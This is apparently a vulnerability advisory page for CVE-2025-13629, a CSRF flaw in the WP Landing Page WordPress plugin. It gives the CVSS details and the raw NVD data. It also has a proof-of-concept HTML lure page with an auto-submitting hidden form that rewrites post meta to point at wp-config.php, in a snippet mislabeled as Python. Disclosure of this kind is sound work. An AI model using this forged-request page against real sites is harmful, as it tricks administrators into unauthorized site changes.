Security Vulnerability Report
中文
CVE-2025-13629 CVSS 4.3 MEDIUM

CVE-2025-13629

Published: 2025-12-06 06:15:52
Last Modified: 2026-04-15 00:35:42

Description

The WP Landing Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the 'wplp_api_update_text' function. This makes it possible for unauthenticated attackers to update arbitrary post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Landing Page plugin <= 0.9.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-13629 --> <!-- This PoC demonstrates how an attacker can trick a WordPress admin --> <!-- into updating arbitrary post meta via a forged request --> <!DOCTYPE html> <html> <head> <title>WP Landing Page CSRF Attack</title> </head> <body> <h1>Click here for a free gift!</h1> <!-- Hidden form that auto-submits --> <form id="csrfForm" action="http://target-site/wp-admin/admin-ajax.php" method="POST"> <!-- wplp_api_update_text action --> <input type="hidden" name="action" value="wplp_api_update_text"> <!-- Target post ID to modify --> <input type="hidden" name="post_id" value="1"> <!-- Malicious meta key --> <input type="hidden" name="meta_key" value="_wp_page_template"> <!-- Malicious meta value --> <input type="hidden" name="meta_value" value="../../../wp-config.php"> </form> <script> // Auto-submit the form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this, the attack failed.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13629", "sourceIdentifier": "[email protected]", "published": "2025-12-06T06:15:51.927", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Landing Page plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9.3. This is due to missing nonce validation on the 'wplp_api_update_text' function. This makes it possible for unauthenticated attackers to update arbitrary post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-landing-page/tags/0.9.3/includes/wplp-api.php#L14", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-landing-page/trunk/includes/wplp-api.php#L14", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8576b-e6ad-4e0a-b99f-948ba36f53ff?source=cve", "source": "[email protected]"}]}}